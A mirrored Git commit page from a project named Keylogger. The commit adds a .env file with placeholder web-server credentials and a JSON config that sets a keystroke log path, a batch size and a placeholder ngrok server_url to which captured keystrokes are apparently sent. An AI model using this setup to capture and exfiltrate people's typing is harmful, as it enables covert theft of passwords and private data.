mirror of
https://github.com/0x5t4l1n/Keylogger.git
synced 2026-05-26 19:36:31 +00:00
Restructure project with organized directories and improved configuration
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
@@ -0,0 +1,6 @@
|
||||
# Web Server Authentication
|
||||
WEB_SERVER_USERNAME=admin
|
||||
WEB_SERVER_PASSWORD=change_this_password
|
||||
|
||||
# Flask Configuration
|
||||
FLASK_DEBUG=False
|
||||
@@ -0,0 +1,13 @@
|
||||
{
|
||||
"keylogger": {
|
||||
"log_file_path": "logs/keylog.txt",
|
||||
"batch_size": 10,
|
||||
"server_url": "https://your-ngrok-url.ngrok-free.app"
|
||||
},
|
||||
"web_server": {
|
||||
"log_file_path": "logs/keylog.txt",
|
||||
"host": "0.0.0.0",
|
||||
"port": 5000,
|
||||
"debug": false
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user